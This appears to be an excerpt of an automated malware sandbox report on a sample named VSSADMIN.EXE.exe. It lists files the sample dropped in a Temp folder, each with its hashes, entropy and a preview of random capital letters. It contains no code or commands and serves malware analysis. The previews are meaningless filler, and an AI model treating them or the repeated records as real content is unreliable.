                                                                                                                                                                    Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\LTKMYBSEYZ.jpg

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.687722658485212
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                    MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                    SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                    SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                    SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\ONBQCLYSPU.docx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699434772658264
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                    MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                    SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                    SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                    SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\ONBQCLYSPU.pdf

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699434772658264
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                    MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                    SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                    SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                    SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\UMMBDNEQBN.png

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\UMMBDNEQBN.xlsx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\VLZDGUKUTZ.jpg

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.701757898321461
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                    MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                    SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                    SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                    SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\WUTJSCBCFX.png

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.688284131239007
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                    MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                    SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                    SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                    SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\XZXHAVGRAG.xlsx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.69156792375111
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                    MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                    SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                    SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                    SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\DTBZGIOOSO.docx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.705615236042988
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                    MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                    SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                    SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                    SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
